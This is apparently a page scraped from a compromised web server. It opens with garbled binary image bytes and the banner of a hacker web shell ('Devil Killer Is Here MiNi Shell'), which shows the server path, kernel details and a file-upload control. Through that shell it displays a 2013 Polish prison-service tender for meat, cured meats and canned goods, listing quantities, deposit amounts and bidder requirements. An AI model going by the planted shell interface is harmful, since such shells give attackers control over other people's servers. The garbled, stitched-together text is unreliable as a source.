JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131108/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131108/455920-N-2013.html

<p class="kh_header"><b>Łódź: dostawy mięsa, produktów miesno-wędliniarskich i konserw do jednostek organizacyjnych słuzby więziennej okręgu łódzkiego</b><br>
<b>Numer ogłoszenia: 455920 - 2013; data zamieszczenia: 08.11.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Okręgowy Inspektorat Służby Więziennej w Łodzi , ul. Smutna 21, 91-729 Łódź, woj. łódzkie, tel. 42 67 50 020, faks 42 67 50 002.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Okręgowy Inspektorat Służby Wieziennej w Łodzi.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> dostawy mięsa, produktów miesno-wędliniarskich i konserw do jednostek organizacyjnych słuzby więziennej okręgu łódzkiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. przedmiotem zamówienia są dostawy artykułów spożywczych                      z grupy CPV 15110000-2 (mięso), CPV 15131100-6 (produkty mięsno-wędliniarskie) i CPV 15131000-5 (konserwy) w asortymencie i w ilościach jak niżej: 
część pierwsza: mięso (CPV 15110000-2)
L.p.
Nazwa produktu
Przewidywana ilość w kg
1
PÓŁTUSZA WIEPRZOWA BEZ GŁOWY I NÓG KLASA U- NIE MROŻONA
3800,00
2
ŁOPATKA WIEPRZOWA 3D (BEZ NOGI I GOLONKI) - NIE MROŻONA 
2100,00
3
SCHAB B/K- NIE MROŻONY
3150,00
4
PACHWINA
2800,00
5
KARKÓWKA B/K- NIE MROŻONA
2120,00
6
MIĘSO WIEPRZOWE GULASZOWE II KL- NIE MROŻONE
19400,00
7
MIĘSO MIELONE WIEPRZOWO-WOŁOWE- NIE MROŻONE
32000,00
8
WĄTROBA WIEPRZOWA- NIE MROŻONA
11000,00
9
SERCA WIEPRZOWE - NIE MROŻONE
6800,00
10
OZORY WIEPRZOWE - NIE MROŻONE
1900,00
11
SŁONINA BEZ SKÓRY- NIE MROŻONE
1700,00
12
ĆWIERĆTUSZA TYLNA WOŁOWA- NIE MROŻONA
1500,00
13
SZPONDER- NIE MROŻONY
1100,00
14
MIĘSO WOŁOWE GULASZOWE KL II- NIE MROŻONE 
14100,00
15
MIĘSO WOŁOWE Z ŁOPATKI KL. I-  NIE MROŻONE
332,00
16
MIĘSO WOŁOWE MIELONE- NIE MROŻONE
6600,00
część druga: produkty mięsno-wędliniarskie (CPV 15131100-6)
L.p.
Nazwa produktu
Przewidywana ilość w kg
1
PARÓWKI CIENKIE 
12730,00
2
SERDELKI
5460,00
3
KIEŁBASA PARÓWKOWA
11010,00
4
MORTADELA
15780,00
5
SZYNKA TYROLSKA
2330,00
6
KIEŁBASA ŚLĄSKA
10860,00
7
KIEŁBASA ZWYCZAJNA
30280,00
8
KIEŁBASA TORUŃSKA
14680,00
9
KIEŁBASA PODWAWELSKA
10630,00
10
KIEŁBASA BIAŁA PARZONA
7910,00
11
KIEŁBASA LITEWSKA
8620,00
12
LUNCH MEAT
8130,00
13
KIEŁBASA WIEJSKA
2330,00
14
KIEŁBASA KRAKOWSKA
6940,00
15
KIEŁBASA GOLONKOWA
6040,00
16
KIEŁBASA ŻYWIECKA
6640,00
17
KIEŁBASA ŁOPATKOWA
440,00
18
PASZTET WOŁOWO-WIEPRZOWY
6860,00
19
PASZTETOWA 
8800,00
20
KASZANKA
15450,00
21
SALCESON WŁOSKI 
9750,00
22
SALCESON CZARNY
6500,00
23
BOCZEK WĘDZONY B/Ż
3890,00
24
PODGARDLE WĘDZONE
1100,00
25
SZYNKA WIEPRZOWA GOTOWANA 
2360,00
26
SMALEC POPULARNY
2000,00
27
PIECZEŃ RZYMSKA
5810,00
28
PIECZEŃ MYŚLIWSKA 
9680,00
29
ROLADA MIELONA
7310,00
część trzecia: konserwy (CPV 15131000-5)
L.p.
Nazwa produktu
Przewidywana ilość w kg
1
PASZTET MAZOWIECKI 280-330g
10000,00
2
KONSERWA TURYSTYCZNA 300-330g
9750,00
3
PRZYSMAK ŚNIADANIOWY 300-330g
6450,00
 
2. Faktyczne zamówienie (co do ilości i asortymentu), z uwagi na zmienną ilość osób żywionych, wynikać będzie ze składanego telefonicznie przez Zamawiającego indywidualnego zapotrzebowania. Jednorazowe zapotrzebowanie zgłaszane Wykonawcy nie musi obejmować wszystkich pozycji występujących w formularzu oferty. Podane w formularzu oferty wielkości zapotrzebowania na wyroby w ciągu trwania umowy mają charakter jedynie szacunkowy. Służyć one będą wyłącznie do porównania ofert i wybrania oferty najkorzystniejszej, bowiem w przybliżeniu odpowiadają strukturze zapotrzebowania na przedmioty zamówienia w takim okresie. Oznacza to, iż wielkości te nie stanowią ostatecznego rozmiaru zamówienia wyrobów, w wyniku czego nie mogą stanowić podstaw do zgłaszania roszczeń z tytułu niezrealizowanych dostaw albo podstawy do odmowy realizacji dostaw. Zamawiający zobowiązuje się, że łączna wartość zamówionych produktów w okresie obowiązywania umowy nie będzie mniejsza niż 70% wartości określonej w ofercie wykonawcy.
3. Dostawy będą realizowane partiami do magazynu Zamawiających indywidualnych transportem Wykonawcy. Dokładną wielkość i terminy dostaw każdorazowo określać będą Zamawiający indywidualni wymienieni w załączniku nr 8. Dostawy winny być realizowane w dni robocze w godzinach określonych w załączniku nr 8 (sobota nie jest dniem roboczym). Dostawa wyrobów dokonywana będzie przystosowanym do tego środkiem transportu WYKONAWCY i w taki sposób, aby nie została naruszona jakość zdrowotna zamówionych wyrobów na jego koszt, loco magazyn Zamawiającego.
4. Wykonawca dostarczy dokumentację dotyczącą artykułów spożywczych, w tym pochodzenie, producenta i datę produkcji oraz świadectwo kontroli jakości - HDI (Handlowy Dokument Identyfikacyjny) - wszystkie objęte zamówieniem produkty dostarczane będą w pojemnikach plastikowych (materiał opakowaniowy dopuszczony do kontaktu z żywnością), zamkniętych pokrywą. Do każdego pojemnika powinna być dołączona etykieta z opisem jego zawartości. Każdy asortyment produktów powinien być dostarczony w oddzielnym pojemniku. Oznakowanie opakowania zbiorczego powinno zawierać:
1) nazwę dostawcy-producenta, adres,
2) nazwa produktu,
3) data - termin produkcji i przydatności do spożycia(należy spożyć do - miesiąc, rok),
4) warunki przechowywania,
5) data załadowania do transportu.
Opakowanie wędlin i wędzonek to vacum, map lub inne wpływające na trwałość artykułu i możliwość dłuższego przechowywania.
5. W sytuacji odmiennego nazewnictwa poszczególnych artykułów mięsnych, Zamawiający dopuszcza możliwość zastosowania nazw własnych (firmowych) producenta, ale wyłącznie wtedy, kiedy Wykonawca nie sprzedaje artykułu o wyżej wymienionej nazwie, a oferowany przez niego wyrób jest z nim tożsamy w procesie produkcji, składu, grupy technologicznej oraz odpowiada danej normie..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-0, 15.11.31.00-6, 15.13.10.00-5, 15.11.00.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający przewiduje konieczności wpłaty wadium. Ustala się wadium w wysokości: 
Część I: 25000,00 zł. słownie: dwadzieścia pięć tysięcy złotych 00/100
Część II: 33200,00 zł. słownie: trzydzieści trzy tysiące dwieście złotych 00/100
Część III: 3400,00 zł. słownie: trzy tysiące czterysta złotych 00/100.
2. Wadium może być wnoszone w jednej lub kilku następujących formach:
1) w pieniądzu, na nieoprocentowane konto zamawiającego: OISW w Łodzi, NBP Oddział Łódź, nr rachunku 55 1010 1371 0067 0913 9120 0000.
2. w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej,
z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3. w gwarancjach bankowych, 
4. w gwarancjach ubezpieczeniowych,
5. w poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. nr 109,poz. 1158 z póź. zmn.)
przed upływem terminu składania ofert. Za termin wniesienia wadium w formie przelewu pieniężnego przyjmuje się termin uznania na rachunku zamawiającego.
3. Na dowodzie wpłaty wadium, wniesionego w formie określonej w pkt. 2 ppkt 1, wykonawca powinien wpisać: znak sprawy OI/KI/G-220/08/13/2949, numer części postepowania (wadium na część..... ) oraz numer konta, na które zamawiający ma zwrócić wadium.
Wykonawca wybierając wadium określone w pkt.2 ppkt. 2 - 5: oryginał składa w oddzielnej, odpowiednio oznakowanej kopercie, z której wynika, do jakiego postępowania jest składane. Wadium należy złożyć w siedzibie zamawiającego, w sekretariacie, w terminie do dnia składania ofert, a kopię dołączyć do oferty.
4. Wadium musi obejmować okres związania ofertą</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w celu potwierdzenia, że Wykonawca posiada uprawnienie do wykonywania określonej działalności, Zamawiający nie opisuje, nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający uzna warunki za spełnione na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu zgodnie z art. 44 ustawy - Prawo zamówień publicznych; (złożone przez Wykonawcę z wykorzystaniem wzoru będącego załącznikiem nr 1 do SIWZ).
Stwierdzenie spełnienia w/w warunków dokona Komisja Przetargowa powołana przez Zamawiającego zgodnie z zasadą spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w celu potwierdzenia, że Wykonawca posiada niezbędną wiedzę i doświadczenie  Zamawiający składa:
1. dotyczy części nr 1 - dostawy mięsa - wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie trzech lat przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, dostaw mięsa o wartości min. 166000,00 zł miesięcznie (słownie: sto sześćdziesiąt sześć tysięcy złotych 00/100), przez okres co najmniej 6 miesięcy wraz z udokumentowaniem, że dostawy te zostały wykonane należycie.
2. dotyczy części nr 2 - dostawy produktów wędliniarskich - wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie trzech lat przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, dostaw wędlin wieprzowo-wołowych o wartości min. 220000,00 zł miesięcznie (słownie: dwieście dwadzieścia tysięcy złotych 00/100) przez okres co najmniej 6 miesięcy wraz z udokumentowaniem,  że dostawy te zostały wykonane należycie.
3. dotyczy części nr 3 - dostawy konserw - wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie trzech lat przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, dostaw konserw mięsnych o wartości min. 22000,00 zł miesięcznie (słownie: dwadzieścia dwa tysiące   złotych 00/100), przez okres co najmniej 6 miesięcy wraz z udokumentowaniem, że dostawy te zostały wykonane należycie.Stwierdzenie spełnienia w/w warunków dokona Komisja Przetargowa powołana przez Zamawiającego zgodnie z zasadą spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w celu potwierdzenia, że Wykonawca dysponuje potencjałem technicznym , Zamawiający nie opisuje, nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający uzna warunki za spełnione na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu zgodnie z art. 44 ustawy - Prawo zamówień publicznych; (złożone przez Wykonawcę z wykorzystaniem wzoru będącego załącznikiem nr 1 do SIWZ).Stwierdzenie spełnienia w/w warunków dokona Komisja Przetargowa powołana przez Zamawiającego zgodnie z zasadą spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w celu potwierdzenia, że Wykonawca dysponuje osobami zdolnymi do wykonania zamówienia, Zamawiający nie opisuje, nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający uzna warunki za spełnione na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu zgodnie z art. 44 ustawy - Prawo zamówień publicznych; (złożone przez Wykonawcę z wykorzystaniem wzoru będącego załącznikiem nr 1 do SIWZ).Stwierdzenie spełnienia w/w warunków dokona Komisja Przetargowa powołana przez Zamawiającego zgodnie z zasadą spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w celu potwierdzenia, że Wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia składa kopię opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.Stwierdzenie spełnienia w/w warunków dokona Komisja Przetargowa powołana przez Zamawiającego zgodnie z zasadą spełnia - nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Ceny jednostkowe są niezmienne przez okres 6 miesięcy od dnia obowiązywania umowy. Po tym okresie mogą być waloryzowane nie częściej niż co 3 miesiące, co najwyżej o aktualny wskaźnik cen towarów i usług konsumpcyjnych obwieszczany przez Prezesa Głównego Urzędu Statystycznego, ogłaszany w Monitorze Polskim.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zp.sw.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład karny w Garbalinie 99-100 Łęczyca, Garbalin, dział kwatermistrzowski tel. 48-24-388-00-32.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.12.2013 godzina 13:00, miejsce: Okręgowy Inspektorat Służby Więziennej ul. Smutna 21, 91-729 Łódź pok. 103.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 60 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> dostawy mięsa wieprzowego, wołowego i podrobów surowych do jednostek organizacyjnych SW okręgu łódzkiego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest : mięso (CPV 15110000-2)
L.p.
Nazwa produktu
Przewidywana ilość w kg
1
PÓŁTUSZA WIEPRZOWA BEZ GŁOWY I NÓG KLASA U- NIE MROŻONA
3800,00
2
ŁOPATKA WIEPRZOWA 3D (BEZ NOGI I GOLONKI) - NIE MROŻONA 
2100,00
3
SCHAB B/K- NIE MROŻONY
3150,00
4
PACHWINA
2800,00
5
KARKÓWKA B/K- NIE MROŻONA
2120,00
6
MIĘSO WIEPRZOWE GULASZOWE II KL- NIE MROŻONE
